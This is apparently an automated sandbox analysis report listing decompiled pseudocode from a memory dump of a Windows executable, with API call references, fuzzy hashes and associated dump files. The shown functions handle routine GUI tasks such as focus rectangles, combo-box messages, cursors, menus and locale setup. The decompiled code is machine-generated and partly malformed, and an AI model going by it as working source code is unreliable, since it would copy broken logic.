					__eflags = _t152 - _t153;
					if(_t152 != _t153) {
						_t155 =  *0x46391c; // 0x1
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
					}
					_t159 =  *0x463918; // 0x11
					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
					_t125 =  *_t212;
					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
						L35:
						return _t125;
					}
					return DrawFocusRect(E00420704( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
				}
			}

APIs

GetFocus.USER32 ref: 004636B8
DrawFocusRect.USER32 ref: 00463700

Part of subcall function 00420284: FillRect.USER32 ref: 004202AC

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FocusRect$DrawFill
String ID:
API String ID: 3476037706-0
Opcode ID: 17622818a8ca401a56829176c6bff68d395b0500457bed29f907a92299647d46
Instruction ID: 6163be331cae4e77df5b0a99f9786b18ed1cade0b67658f7b256ceccc7b46225
Opcode Fuzzy Hash: 17622818a8ca401a56829176c6bff68d395b0500457bed29f907a92299647d46
Instruction Fuzzy Hash: FC917C74A00149CFCB10EF58C485AAAB7F5BF08315F2444BAE9849B353E738ED85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042C838, Relevance: 6.2, APIs: 4, Instructions: 224
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0042C838(intOrPtr __eax, void* __ebx, char* __edx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				long _t97;
				void* _t101;
				intOrPtr _t104;
				void* _t109;
				char _t118;
				long _t135;
				void* _t145;
				intOrPtr _t146;
				char _t148;
				intOrPtr _t152;
				char _t154;
				char _t161;
				void* _t169;
				char _t172;
				char _t174;
				char* _t186;
				void* _t187;
				intOrPtr _t202;
				intOrPtr _t207;
				intOrPtr _t238;
				intOrPtr _t239;

				_t233 = __esi;
				_t238 = _t239;
				_t187 = 7;
				do {
					_push(0);
					_push(0);
					_t187 = _t187 - 1;
				} while (_t187 != 0);
				_push(__ebx);
				_push(__esi);
				_t186 = __edx;
				_v8 = __eax;
				_push(_t238);
				_push(0x42cb2d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t239;
				E0043B224(_v8, __edx);
				if( *((char*)(_v8 + 0x268)) == 0) {
					L30:
					_pop(_t202);
					 *[fs:eax] = _t202;
					_push(0x42cb34);
					E0040436C( &_v60, 4);
					E00404348( &_v44);
					E0040436C( &_v40, 2);
					E0040436C( &_v32, 2);
					return E0040436C( &_v24, 2);
				} else {
					if( *((intOrPtr*)(_v8 + 0x276)) - 2 >= 0) {
						_t97 = GetTickCount();
						_t207 = _v8;
						__eflags = _t97 -  *((intOrPtr*)(_t207 + 0x26c)) - 0x1f4;
						if(_t97 -  *((intOrPtr*)(_t207 + 0x26c)) >= 0x1f4) {
							__eflags = _v8 + 0x270;
							E00404348(_v8 + 0x270);
						}
						 *((intOrPtr*)(_v8 + 0x26c)) = GetTickCount();
					} else {
						E00435B74(_v8,  &_v28);
						E0040439C(_v8 + 0x270, _v28);
					}
					_t101 =  *_t186 - 8;
					if(_t101 == 0) {
						__eflags = E0042C744( &_v12,  &_v16, _t238);
						if(__eflags == 0) {
							_t104 = _v8;
							__eflags =  *((intOrPtr*)(_t104 + 0x276)) - 2;
							if( *((intOrPtr*)(_t104 + 0x276)) - 2 >= 0) {
								L20:
								_t109 = E00404600( *((intOrPtr*)(_v8 + 0x270)));
								__eflags = _v8 + 0x270;
								E00404898(_v8 + 0x270, 1, _t109);
								L21:
								 *_t186 = 0;
								E004037D8(_v8, __eflags);
								goto L30;
							}
							E00435B74(_v8,  &_v32);
							_t118 = E00404600(_v32);
							__eflags = _t118;
							if(_t118 <= 0) {
								goto L20;
							}
							E00435B74(_v8,  &_v24);
							E00404858(_v24, _v12 - 1, 1,  &_v20);
							SendMessageA(E0043C1F4(_v8), 0x14e, 0xffffffff, 0);
							E00404858(_v24, 0x7fffffff, _v16 + 1,  &_v40);
							E0040464C( &_v36, _v40, _v20);
							E00435BA4(_v8, _t186, _v36, _t233);
							_t135 = E00407314();
							SendMessageA(E0043C1F4(_v8), 0x142, 0, _t135);
							E00435B74(_v8,  &_v44);
							E0040439C(_v8 + 0x270, _v44);
							goto L21;
						}
						E0042C770(_t186, _t233, __eflags, _t238);
						goto L21;
					} else {
						_t145 = _t101 - 1;
						if(_t145 == 0) {
							_t146 = _v8;
							__eflags =  *((char*)(_t146 + 0x269));
							if( *((char*)(_t146 + 0x269)) != 0) {
								_t148 = E0042B758(_v8);
								__eflags = _t148;
								if(_t148 != 0) {
									E0042B77C(_v8, 0);
								}
							}
						} else {
							if(_t145 != 0x12) {
								_t152 = _v8;
								__eflags =  *((char*)(_t152 + 0x269));
								if( *((char*)(_t152 + 0x269)) != 0) {
									_t174 = E0042B758(_v8);
									__eflags = _t174;
									if(_t174 == 0) {
										E0042B77C(_v8, 1);
									}
								}
								_t154 = E0042C744( &_v12,  &_v16, _t238);
								__eflags = _t154;
								if(_t154 == 0) {
									E00404528();
									E0040464C( &_v56, _v60,  *((intOrPtr*)(_v8 + 0x270)));
									_t161 = E0042CB3C(_v8, _t186, _v56, _t233);
									__eflags = _t161;
									if(_t161 != 0) {
										 *_t186 = 0;
									}
								} else {
									E00404858( *((intOrPtr*)(_v8 + 0x270)), _v12, 1,  &_v48);
									_push( &_v48);
									E00404528();
									_pop(_t169);
									E00404608(_t169, _v52);
									_t172 = E0042CB3C(_v8, _t186, _v48, _t233);
									__eflags = _t172;
									if(_t172 != 0) {
										 *_t186 = 0;
									}
								}
							}
						}
						goto L30;
					}
				}
			}

APIs

GetTickCount.KERNEL32 ref: 0042C8A0
GetTickCount.KERNEL32 ref: 0042C8C2

Part of subcall function 0042C744: SendMessageA.USER32(00000000,00000140), ref: 0042C760

SendMessageA.USER32(00000000,0000014E,000000FF,00000000), ref: 0042C991
SendMessageA.USER32(00000000,00000142,00000000,00000000), ref: 0042C9E3

Part of subcall function 0042C770: SendMessageA.USER32(00000000,00000140,?,?), ref: 0042C7B1
Part of subcall function 0042C770: SendMessageA.USER32(00000000,0000014E,000000FF,00000000), ref: 0042C7DD
Part of subcall function 0042C770: SendMessageA.USER32(00000000,00000142,00000000,00000000), ref: 0042C811

Part of subcall function 0042B758: SendMessageA.USER32(00000000,00000157,00000000,00000000), ref: 0042B76C

Part of subcall function 0042B77C: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0042B799
Part of subcall function 0042B77C: InvalidateRect.USER32(00000000,000000FF,000000FF), ref: 0042B7B6

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CountTick$InvalidateRect
String ID:
API String ID: 2080777977-0
Opcode ID: 02f8b78442ad41952da4eacdc125df59e2d774f7227366466d51d5b39afdfd6e
Instruction ID: 11bde4e1897c2e49cbd936de07934a7eb30604cd500c9c0f211fc9ccb53c35b3
Opcode Fuzzy Hash: 02f8b78442ad41952da4eacdc125df59e2d774f7227366466d51d5b39afdfd6e
Instruction Fuzzy Hash: 0B815C70A04158DBCF00EBA9D586BDEB7B5AF85304F6041B6E404BB392CB38AE05DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00433A84, Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00433A84(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x492ba8 != 0) {
					L3:
					_t49 =  *0x492b88; // 0x0
					_t50 =  *0x492b88; // 0x0
					_t117 = E00433964(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x492ba8 == 0) {
						_t168 =  *0x492bac;
						if( *0x492bac != 0) {
							_t106 =  *0x492b9c; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x492bac; // 0x0
							E0043DA18(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x492b88; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x492ba8;
						_t6 =  &_v24;
						 *_t6 =  *0x492ba8 != 0;
						__eflags =  *_t6;
						 *0x492ba8 = 2;
					} else {
						 *0x492ba8 = 1;
						_v24 = 0;
					}
					_t54 =  *0x492b8c; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x492b8c; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x492b8c; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x492b8c; // 0x0
							E004356B8( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x492b8c; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E004339B4(2);
						_t121 =  *_t155;
						_t60 =  *0x492b8c; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x492bac != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x492bac; // 0x0
								E0043D9D4(_t82, _t158);
								_t84 =  *0x492bac; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x492bac; // 0x0
									E0043DB00(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x492bac; // 0x0
									E0043DA18(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x492bac; // 0x0
								E0043DB74(_t91, _t131, __eflags);
								_t93 =  *0x491278; // 0x492c08
								SetCursor(E00453674( *_t93, _t158));
							}
						}
						_t62 =  *0x491278; // 0x492c08
						_t65 = SetCursor(E00453674( *_t62, _t158));
						if( *0x492ba8 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E004339F0(_t121);
								_t67 =  *0x492b8c; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E004356B8(_t118,  &_v24, _t155);
									_t65 = E004037D8(_t118, __eflags);
									_t135 =  *0x492b8c; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x492b8c; // 0x0
									_t65 = E004037D8( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x492b8c; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x492b8c; // 0x0
								_t65 = E004037D8( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x492b8c == 0) {
								goto L32;
							} else {
								_t119 =  *0x492b8c; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E004084F0(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x492b8c; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x492b8c; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x492b8c; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E004339B4(1);
					if( *0x492b8c == 0) {
						goto L32;
					}
					_t102 =  *0x492b8c; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x492b8c; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x492b8c; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E004339B4(0);
					if( *0x492b8c == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x492b98; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x492ba4; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x492b9c; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x492ba4; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

APIs

GetDesktopWindow.USER32 ref: 00433AF8
GetDesktopWindow.USER32 ref: 00433C1D
SetCursor.USER32(00000000), ref: 00433C72

Part of subcall function 0043DB74: 73451770.COMCTL32(00000000,?,00433C4D), ref: 0043DB90
Part of subcall function 0043DB74: ShowCursor.USER32(000000FF,00000000,?,00433C4D), ref: 0043DBAB

SetCursor.USER32(00000000), ref: 00433C5D

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$DesktopWindow$73451770Show
String ID:
API String ID: 3513720257-0
Opcode ID: 11b7e4f1413237eced4deb2d148f9e5fa6250a4fa388d30e17b224b1d1875de7
Instruction ID: 7296cc54ccdd903f39ca6ff1e78eba425dce0e2d0d4a0d4ed3677a73396da221
Opcode Fuzzy Hash: 11b7e4f1413237eced4deb2d148f9e5fa6250a4fa388d30e17b224b1d1875de7
Instruction Fuzzy Hash: 9C917EB4200241EFC704DF69DA84A16B7E5BB68315F14917BE8488B3B2D7B8FD45CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004586FC, Relevance: 6.2, APIs: 4, Instructions: 163
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004586FC(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				char _v508;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _t75;
				intOrPtr _t91;
				char* _t97;
				signed int _t107;
				signed int _t114;
				intOrPtr _t121;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t146;
				int _t152;
				intOrPtr _t153;
				void* _t163;
				void* _t164;
				intOrPtr _t165;

				_t163 = _t164;
				_t165 = _t164 + 0xfffffde4;
				_v544 = 0;
				_v540 = 0;
				_v536 = 0;
				_v532 = 0;
				_v528 = 0;
				_t133 = __edx;
				_v8 = __eax;
				_push(_t163);
				_push(0x45895c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t165;
				if(__edx >= 1) {
					E004581C4(_v8,  &_v528);
					if(E0040A9D4(_v528, _t133) == 1) {
						_t133 = _t133 - 1;
					}
				}
				_v12 = _t133;
				if(E004584DC(_v8) == 0) {
					__eflags = _v12;
					if(_v12 < 0) {
						__eflags = 0;
						_v12 = 0;
					}
					E004581C4(_v8,  &_v540);
					_t75 = E00404600(_v540);
					__eflags = _t75 - _v12;
					if(_t75 <= _v12) {
						E004581C4(_v8,  &_v544);
						_v12 = E00404600(_v544);
					}
					E004586D8(_v8, _v12, _v12);
					goto L21;
				} else {
					if(_v12 < 0) {
						_v12 = 0;
					}
					_t135 = _v12 + 1;
					E004581C4(_v8,  &_v532);
					if(_t135 < E00404600(_v532)) {
						E004581C4(_v8,  &_v536);
						asm("bt [edx], eax");
						if(( *(_v536 + _t135 - 1) & 0x000000ff) < 0) {
							_t135 = _t135 + 1;
						}
					}
					_t24 = _v8 + 0x228; // 0x926855c0
					_t91 =  *_t24;
					if(_t91 <= _v12) {
						_v12 = _t91;
						_t135 = _v12;
					}
					E004586D8(_v8, _t135, _t135);
					if(_t135 == _v12) {
						 *((intOrPtr*)(_v8 + 0x230)) = _v12;
						L21:
						__eflags = 0;
						_pop(_t146);
						 *[fs:eax] = _t146;
						_push(0x458963);
						return E0040436C( &_v544, 5);
					} else {
						GetKeyboardState( &_v268);
						_t152 = 0x100;
						_t97 =  &_v524;
						do {
							 *_t97 = 0;
							_t97 = _t97 + 1;
							_t152 = _t152 - 1;
							_t177 = _t152;
						} while (_t152 != 0);
						_v508 = 0x81;
						 *((char*)(_t163 + ( *(0x476c74 + (E004037D8(_v8, _t177) & 0x0000007f) * 2) & 0x0000ffff) - 0x208)) = 0x81;
						SetKeyboardState( &_v524);
						 *((char*)(_v8 + 0x23c)) = 1;
						_push(_t163);
						_push(0x4588ca);
						_push( *[fs:eax]);
						 *[fs:eax] = _t165;
						_t107 = E004037D8(_v8, _t177);
						SendMessageA(E0043C1F4(_v8), 0x100,  *(0x476c74 + (_t107 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_t114 = E004037D8(_v8, _t177);
						SendMessageA(E0043C1F4(_v8), 0x101,  *(0x476c74 + (_t114 & 0x0000007f) * 2) & 0x0000ffff, 1);
						_pop(_t153);
						 *[fs:eax] = _t153;
						_push(0x4588d1);
						_t121 = _v8;
						 *((char*)(_t121 + 0x23c)) = 0;
						return _t121;
					}
				}
			}

APIs

GetKeyboardState.USER32(?,00000000,0045895C), ref: 004587F7
SetKeyboardState.USER32(00000081), ref: 0045883B
SendMessageA.USER32(00000000,00000100,00000000,00000001), ref: 00458880
SendMessageA.USER32(00000000,00000101,00000000,00000001), ref: 004588AD

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardMessageSendState
String ID:
API String ID: 1999190242-0
Opcode ID: 55297c9ea813afe2186692b7ad6214ec5963d49b08753265d5d2abc067a7a9bb
Instruction ID: bb88850a2d90e2ea23539d4f08a87eb6d4946d203e876879aff1aee77e364116
Opcode Fuzzy Hash: 55297c9ea813afe2186692b7ad6214ec5963d49b08753265d5d2abc067a7a9bb
Instruction Fuzzy Hash: 53615F74A04608AFCB10EF69C885ADDB7F4EB59304F6045EAE844B7392DF386E84DB15

Uniqueness

Uniqueness Score: -1.00%

Function 0044FA78, Relevance: 6.1, APIs: 4, Instructions: 148
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0044FA78(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x44fc3e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E00448D1C(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E0041C248(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E0043C4F8(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0043C1F4(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E0043C4F8(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0043C1F4(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0043C4F8(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E0043C1F4(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E0043C1F4(_t92), _t70);
								}
								E00448D1C(_t113, E0043C1F4(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00450B38(_t92, 1);
							}
							E0044F9B0(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x44fc45);
							return E00404348( &_v20);
						}
					}
				}
				_t77 =  *0x492c08; // 0x221094c
				_t79 = E004531FC(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x492c08; // 0x221094c
						if(_t113 ==  *((intOrPtr*)(E004531E8(_t81, _t111) + 0x248))) {
							_t83 =  *0x492c08; // 0x221094c
							if(_t92 != E004531E8(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x490f80; // 0x41d740
								E00406548(_t87,  &_v20);
								E0040A194(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00403DA8();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}

APIs

GetMenu.USER32(00000000), ref: 0044FB9C
SetMenu.USER32(00000000,00000000), ref: 0044FBB9
SetMenu.USER32(00000000,00000000), ref: 0044FBEE
SetMenu.USER32(00000000,00000000,00000000,0044FC3E), ref: 0044FC0A

Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$LoadString
String ID:
API String ID: 3688185913-0
Opcode ID: c7402057d5051b8cebe982a6553d5c4c8eaad23a679fe6021d77e61103d795d6
Instruction ID: c504724d74a112fb591eb9aefa866a242ebe120f49003dff776dd0f675651a9d
Opcode Fuzzy Hash: c7402057d5051b8cebe982a6553d5c4c8eaad23a679fe6021d77e61103d795d6
Instruction Fuzzy Hash: 2451C030A002455BEB21EF69C89575A7795EF0A308F0441BBEC00AB39BCA7CEC49D76C

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE18, Relevance: 6.1, APIs: 4, Instructions: 95
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AE18() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x4927f0 = 0x409;
				 *0x4927f4 = 9;
				 *0x4927f8 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x4927f0 = _t14;
				}
				if(_t14 != 0) {
					 *0x4927f4 = _t14 & 0x3ff;
					 *0x4927f8 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x4760c0, 0x40af6c, 8 << 2);
				if( *0x4760ac != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x4927fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x4927fc = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040ADA0(__eflags, _t49);
					}
				} else {
					_t20 = E0040AE00();
					if(_t20 != 0) {
						 *0x4927fd = 0;
						 *0x4927fc = 0;
						return _t20;
					}
					E0040ADA0(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00403120(0x4760c0, 0x20, 0x40af6c);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x4927fc = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x4927fd = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x4927f0; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x4927fd = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}

APIs

GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AF0C
GetThreadLocale.KERNEL32 ref: 0040AE42

Part of subcall function 0040ADA0: GetCPInfo.KERNEL32(00000000,?), ref: 0040ADB9

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
